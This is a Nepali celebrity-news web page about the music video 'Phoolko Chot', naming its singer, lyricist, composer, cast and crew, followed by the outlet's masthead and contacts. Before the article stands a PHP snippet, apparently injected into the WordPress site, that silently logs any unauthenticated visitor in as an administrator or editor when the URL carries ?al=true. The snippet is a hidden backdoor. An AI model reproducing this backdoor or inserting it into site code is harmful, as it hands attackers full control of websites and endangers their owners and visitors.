// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); राजेन्द्रको ‘फूलको चोट’ मा प्रिती, सुधीर र आश्माको त्रिकोणात्मक प्रेम | Celebrity Nepal

राजेन्द्रको ‘फूलको चोट’ मा प्रिती, सुधीर र आश्माको त्रिकोणात्मक प्रेम



काठमाडौं। आफूसँग बिहेका लागि तयार यूवाले अर्की यूवतीसँग बिहे गरेको देख्दा, एक यूवतीको मनमा कस्तो चोट पर्छ होला ? यस्तै मर्म बोकेको छ गीत ‘फूलको चोट’ ले । गायिका रचना रिमालको स्वर, प्रिती कार्कीको शब्द रहेको गीतमा राजेन्द्र बजगाईको संगीत छ ।

गीतको भिडियोमा सुधिर श्रेष्ठ, आश्मा गिरी र प्रिती कार्कीको अभिनय देख्न सकिन्छ । शिलन लम्सालको सम्पादन रहेको भिडियोमा उत्सव दाहालको छायांकन छ । सुधीर, प्रिती र आश्माको दोहोरो प्रेम देखाइएको भिडियो माइकल चन्दले निर्देशन गरेका हुन् । भिडियो प्रिती कार्कीको अफिसियल यु ट्युब च्यानल मार्फत सार्वजनिक गरिएको छ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.